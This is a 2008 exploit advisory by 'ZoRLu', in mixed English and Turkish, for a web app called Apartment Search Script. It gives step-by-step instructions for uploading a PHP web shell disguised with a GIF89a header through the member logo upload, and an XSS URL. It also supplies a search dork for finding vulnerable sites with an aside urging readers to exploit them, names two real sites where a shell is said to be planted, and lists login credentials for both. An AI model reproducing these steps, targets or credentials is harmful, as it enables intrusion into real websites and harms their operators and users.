[~] Apartment Search Script Multiple Remote Vuln. [~] [~] Remote File Upload & XSS [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 02.11.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] dork: allinurl:"listtest.php?r=" ( cok site var sömürün : ) ) [~] [~] ---------------------------------------------------------- exploit: http://localhost/script_path/Member_Admin/logo/[id]your_shell.php XSS http://localhost/script_path/listtest.php?r="> example 1 (demo): http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php example 2: http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php XSS example: http://www.apt.cc/listtest.php?r="> --------------------------------------------------------------------------- you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI ) and you add this code your shell to head GIF89a; (en uste bu kodu ekle ) example your_shell.php: GIF89a; and save your_sheell.php ( isim ver ve kaydet ) ---------------------------------------------------------------------------- you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol ) and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap ) after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] ) or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla ) and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et ) after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin ) if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI ) after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas ) your_shell.php http://localhost/script_path/Member_Admin/logo/[id]your_shell.php ------------------------------------------------------------------------------- example 1 (demo): http://www.downlinegoldmine.com/apartment/Member_Admin/index.php email: zorlu@w.cn password: 123456 or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666 edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666 and shell.php http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php example 2: http://www.apt.cc/Member_Admin/index.php email: zorlu@w.cn password: 123456 or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187 edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187 and shell.php http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------